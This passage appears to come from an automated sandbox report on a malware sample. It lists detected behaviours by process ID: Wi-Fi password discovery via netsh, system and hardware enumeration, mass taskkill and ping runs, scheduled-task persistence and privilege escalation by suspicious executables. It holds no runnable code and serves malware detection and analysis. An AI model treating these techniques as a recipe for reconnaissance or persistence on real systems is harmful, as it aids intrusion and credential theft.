pid Process 3780 PING.EXE 952 PING.EXE 2588 PING.EXE 3108 PING.EXE 4380 PING.EXE 8480 PING.EXE 5404 PING.EXE 3468 PING.EXE 7380 PING.EXE 5204 PING.EXE 2144 PING.EXE 4708 PING.EXE 916 PING.EXE 1032 PING.EXE 7268 PING.EXE 3708 PING.EXE 7312 PING.EXE 5968 PING.EXE 1996 PING.EXE 4196 PING.EXE 4876 PING.EXE 5736 PING.EXE 5884 PING.EXE 1680 PING.EXE 3092 PING.EXE 716 PING.EXE 2796 PING.EXE 1908 PING.EXE 6596 PING.EXE 4696 PING.EXE 5604 PING.EXE 3976 PING.EXE 5572 PING.EXE 7368 PING.EXE 2876 PING.EXE 1272 PING.EXE 3792 PING.EXE 5100 PING.EXE 8820 PING.EXE 5176 PING.EXE 660 PING.EXE 1276 PING.EXE 6784 PING.EXE 984 PING.EXE 8220 PING.EXE 3524 PING.EXE 3972 PING.EXE 1676 PING.EXE 5600 PING.EXE 5568 PING.EXE 5872 PING.EXE 4364 PING.EXE 4992 PING.EXE 5988 PING.EXE 5412 PING.EXE 1908 PING.EXE 3368 PING.EXE 9156 PING.EXE 5304 PING.EXE 2028 PING.EXE 2340 PING.EXE 6612 PING.EXE 7744 PING.EXE 6060 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4936 cmd.exe 2472 netsh.exe 1488 cmd.exe 5220 netsh.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x001e00000002ab30-10.dat nsis_installer_1 behavioral2/files/0x001e00000002ab30-10.dat nsis_installer_2 -
Delays execution with timeout.exe 1 IoCs
pid Process 3780 timeout.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1100 WMIC.exe 1752 WMIC.exe 1796 WMIC.exe 6116 WMIC.exe 2808 WMIC.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 6276 systeminfo.exe 3540 systeminfo.exe -
Kills process with taskkill 34 IoCs
pid Process 6736 taskkill.exe 5996 taskkill.exe 1116 taskkill.exe 5256 taskkill.exe 1608 taskkill.exe 6056 taskkill.exe 5480 taskkill.exe 3084 taskkill.exe 896 taskkill.exe 5092 taskkill.exe 3928 taskkill.exe 2876 taskkill.exe 6068 taskkill.exe 1528 taskkill.exe 8836 taskkill.exe 5884 taskkill.exe 3312 taskkill.exe 9192 taskkill.exe 1456 taskkill.exe 4084 taskkill.exe 6896 taskkill.exe 8088 taskkill.exe 5676 taskkill.exe 7700 taskkill.exe 3012 taskkill.exe 8772 taskkill.exe 4620 taskkill.exe 5656 taskkill.exe 5336 taskkill.exe 5260 taskkill.exe 6712 taskkill.exe 3960 taskkill.exe 7580 taskkill.exe 7304 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133823213215072396" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000020000000100000000000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000004000000030000000200000000000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "13" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1226833921" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000040000000300000002000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000a7150e1bb218db01a30a54d0806fdb01a30a54d0806fdb0114000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000030000000200000000000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4249425805-3408538557-1766626484-1000\{F9DEE457-A918-4FA9-A0C2-6ED20CBC2D78} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000001000000030000000200000000000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0 chrome.exe Key created \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3320 reg.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 9156 PING.EXE 3468 PING.EXE 1680 PING.EXE 8304 PING.EXE 3368 PING.EXE 5176 PING.EXE 5404 PING.EXE 7368 PING.EXE 7312 PING.EXE 916 PING.EXE 5604 PING.EXE 5412 PING.EXE 8820 PING.EXE 4708 PING.EXE 5736 PING.EXE 3564 PING.EXE 5968 PING.EXE 4992 PING.EXE 4876 PING.EXE 2340 PING.EXE 2876 PING.EXE 7268 PING.EXE 5272 PING.EXE 5884 PING.EXE 7380 PING.EXE 1908 PING.EXE 7788 PING.EXE 2588 PING.EXE 5572 PING.EXE 660 PING.EXE 716 PING.EXE 3524 PING.EXE 3972 PING.EXE 6596 PING.EXE 6504 PING.EXE 3092 PING.EXE 1996 PING.EXE 6612 PING.EXE 5988 PING.EXE 4380 PING.EXE 5100 PING.EXE 5568 PING.EXE 1276 PING.EXE 4696 PING.EXE 5560 PING.EXE 5304 PING.EXE 7744 PING.EXE 952 PING.EXE 6784 PING.EXE 4640 PING.EXE 1272 PING.EXE 5204 PING.EXE 8480 PING.EXE 6060 PING.EXE 4364 PING.EXE 5600 PING.EXE 3780 PING.EXE 2144 PING.EXE 3976 PING.EXE 1676 PING.EXE 3108 PING.EXE 984 PING.EXE 1032 PING.EXE 3792 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6532 schtasks.exe 6712 schtasks.exe 3256 schtasks.exe 7956 schtasks.exe 8960 schtasks.exe 4064 schtasks.exe 5900 schtasks.exe 6692 schtasks.exe 716 schtasks.exe 4844 schtasks.exe 8408 schtasks.exe 1108 schtasks.exe 1540 schtasks.exe 4780 schtasks.exe 7116 schtasks.exe 540 schtasks.exe 3300 schtasks.exe 7432 schtasks.exe 8020 schtasks.exe 968 schtasks.exe 5932 schtasks.exe 7228 schtasks.exe 4532 schtasks.exe 5020 schtasks.exe 2360 schtasks.exe 2488 schtasks.exe 2980 schtasks.exe 5508 schtasks.exe 5864 schtasks.exe 2620 schtasks.exe 9096 schtasks.exe 5956 schtasks.exe 4544 schtasks.exe 8072 schtasks.exe 3008 schtasks.exe 4860 schtasks.exe 2220 schtasks.exe 1420 schtasks.exe 752 schtasks.exe 6296 schtasks.exe 6640 schtasks.exe 6272 schtasks.exe 1668 schtasks.exe 8900 schtasks.exe 6600 schtasks.exe 856 schtasks.exe 1284 schtasks.exe 5844 schtasks.exe 708 schtasks.exe 4744 schtasks.exe 3868 schtasks.exe 3324 schtasks.exe 6976 schtasks.exe 4556 schtasks.exe 1380 schtasks.exe 1136 schtasks.exe 2332 schtasks.exe 660 schtasks.exe 3992 schtasks.exe 4836 schtasks.exe 5408 schtasks.exe 1148 schtasks.exe 5492 schtasks.exe 2392 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 760 chrome.exe 760 chrome.exe 3272 powershell.exe 3272 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 3272 powershell.exe 1176 powershell.exe 1176 powershell.exe 1176 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 224 powershell.exe 224 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 224 powershell.exe 4008 powershell.exe 4008 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 4008 powershell.exe 4312 msedge.exe 4312 msedge.exe 1768 msedge.exe 1768 msedge.exe 5388 msedge.exe 5388 msedge.exe 5352 msedge.exe 5352 msedge.exe 5276 msedge.exe 5276 msedge.exe 6052 msedge.exe 6052 msedge.exe 5320 powershell.exe 5320 powershell.exe 5320 powershell.exe 6092 powershell.exe 6092 powershell.exe 6092 powershell.exe 4364 powershell.exe 4364 powershell.exe 4364 powershell.exe 1188 svchost.exe 1188 svchost.exe 3796 powershell.exe 3796 powershell.exe 3796 powershell.exe 5884 powershell.exe 5884 powershell.exe 5884 powershell.exe 3684 powershell.exe 3684 powershell.exe 1384 powershell.exe 1384 powershell.exe 2704 powershell.exe 2704 powershell.exe 4752 powershell.exe 4752 powershell.exe 2928 alphaTweaks.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 8656 XClient.exe 1188 svchost.exe 5024 ipscan.exe 5492 svchost.exe 3780 idmans.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 984 cluton.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5048 4363463463464363463463463.exe Token: SeDebugPrivilege 2316 cluton.exe Token: SeDebugPrivilege 1188 svchost.exe Token: SeDebugPrivilege 3928 taskkill.exe Token: SeShutdownPrivilege 760 chrome.exe Token: SeCreatePagefilePrivilege 760 chrome.exe Token: SeDebugPrivilege 1984 Gorebox%20ModMenu%201.2.0.exe Token: SeShutdownPrivilege 760 chrome.exe Token: SeCreatePagefilePrivilege 760 chrome.exe Token: SeDebugPrivilege 3272 powershell.exe Token: SeDebugPrivilege 4332 Helper.exe Token: SeDebugPrivilege 1116 tasklist.exe Token: SeIncreaseQuotaPrivilege 4088 WMIC.exe Token: SeSecurityPrivilege 4088 WMIC.exe Token: SeTakeOwnershipPrivilege 4088 WMIC.exe Token: SeLoadDriverPrivilege 4088 WMIC.exe Token: SeSystemProfilePrivilege 4088 WMIC.exe Token: SeSystemtimePrivilege 4088 WMIC.exe Token: SeProfSingleProcessPrivilege 4088 WMIC.exe Token: SeIncBasePriorityPrivilege 4088 WMIC.exe Token: SeCreatePagefilePrivilege 4088 WMIC.exe Token: SeBackupPrivilege 4088 WMIC.exe Token: SeRestorePrivilege 4088 WMIC.exe Token: SeShutdownPrivilege 4088 WMIC.exe Token: SeDebugPrivilege 4088 WMIC.exe Token: SeSystemEnvironmentPrivilege 4088 WMIC.exe Token: SeRemoteShutdownPrivilege 4088 WMIC.exe Token: SeUndockPrivilege 4088 WMIC.exe Token: SeManageVolumePrivilege 4088 WMIC.exe Token: 33 4088 WMIC.exe Token: 34 4088 WMIC.exe Token: 35 4088 WMIC.exe Token: 36 4088 WMIC.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeIncreaseQuotaPrivilege 4088 WMIC.exe Token: SeSecurityPrivilege 4088 WMIC.exe Token: SeTakeOwnershipPrivilege 4088 WMIC.exe Token: SeLoadDriverPrivilege 4088 WMIC.exe Token: SeSystemProfilePrivilege 4088 WMIC.exe Token: SeSystemtimePrivilege 4088 WMIC.exe Token: SeProfSingleProcessPrivilege 4088 WMIC.exe Token: SeIncBasePriorityPrivilege 4088 WMIC.exe Token: SeCreatePagefilePrivilege 4088 WMIC.exe Token: SeBackupPrivilege 4088 WMIC.exe Token: SeRestorePrivilege 4088 WMIC.exe Token: SeShutdownPrivilege 4088 WMIC.exe Token: SeDebugPrivilege 4088 WMIC.exe Token: SeSystemEnvironmentPrivilege 4088 WMIC.exe Token: SeRemoteShutdownPrivilege 4088 WMIC.exe Token: SeUndockPrivilege 4088 WMIC.exe Token: SeManageVolumePrivilege 4088 WMIC.exe Token: 33 4088 WMIC.exe Token: 34 4088 WMIC.exe Token: 35 4088 WMIC.exe Token: 36 4088 WMIC.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeShutdownPrivilege 760 chrome.exe Token: SeCreatePagefilePrivilege 760 chrome.exe Token: SeIncreaseQuotaPrivilege 1100 WMIC.exe Token: SeSecurityPrivilege 1100 WMIC.exe Token: SeTakeOwnershipPrivilege 1100 WMIC.exe Token: SeLoadDriverPrivilege 1100 WMIC.exe Token: SeSystemProfilePrivilege 1100 WMIC.exe Token: SeSystemtimePrivilege 1100 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 760 chrome.exe 760 chrome.exe 6052 msedge.exe 2396 calendar.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe -
Suspicious use of SendNotifyMessage 39 IoCs
pid Process 2396 calendar.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe 5868 chrome.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
